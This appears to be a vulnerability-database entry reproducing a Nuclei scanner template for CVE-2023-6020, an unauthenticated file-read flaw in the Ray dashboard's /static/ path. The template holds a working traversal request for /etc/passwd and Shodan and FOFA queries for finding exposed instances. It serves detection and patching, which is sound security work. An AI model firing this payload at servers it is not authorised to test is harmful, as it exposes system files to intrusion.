Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-6020
HistoryDec 05, 2023 - 4:15 p.m.

Ray Static File - Local File Inclusion

2023-12-0516:15:41
ProjectDiscovery
github.com
16
cve2023
lfi
ray
authentication
attackers
sever
highseverity
cvss3.1
noauthentication

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

8.3

Confidence

High

EPSS

0.405

Percentile

97.3%

LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.
id: CVE-2023-6020

info:
  name: Ray Static File - Local File Inclusion
  author: byt3bl33d3r
  severity: high
  description: |
    LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.
  reference:
    - https://huntr.com/bounties/83dd8619-6dc3-4c98-8f1b-e620fedcd1f6/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6020
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-6020
    cwe-id: CWE-862
    epss-score: 0.06351
    epss-percentile: 0.93636
    cpe: cpe:2.3:a:ray_project:ray:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ray_project
    product: ray
    shodan-query:
      - http.favicon.hash:463802404
      - http.html:"ray dashboard"
    fofa-query:
      - body="ray dashboard"
      - icon_hash=463802404
  tags: cve2023,cve,lfi,ray,oos,ray_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/static/js/../../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "application/octet-stream"
          - "aiohttp"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450220016faf5d218a154c3f85462ee9932819b2423bfcb41ffda404b70dee337dd6b7022100e89b86ddec2eb7b76100a9561996bcb97cb09eb953888a2dc7890bf1b81e5f32:922c64590222798bb761d5b6d8e72950

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

8.3

Confidence

High

EPSS

0.405

Percentile

97.3%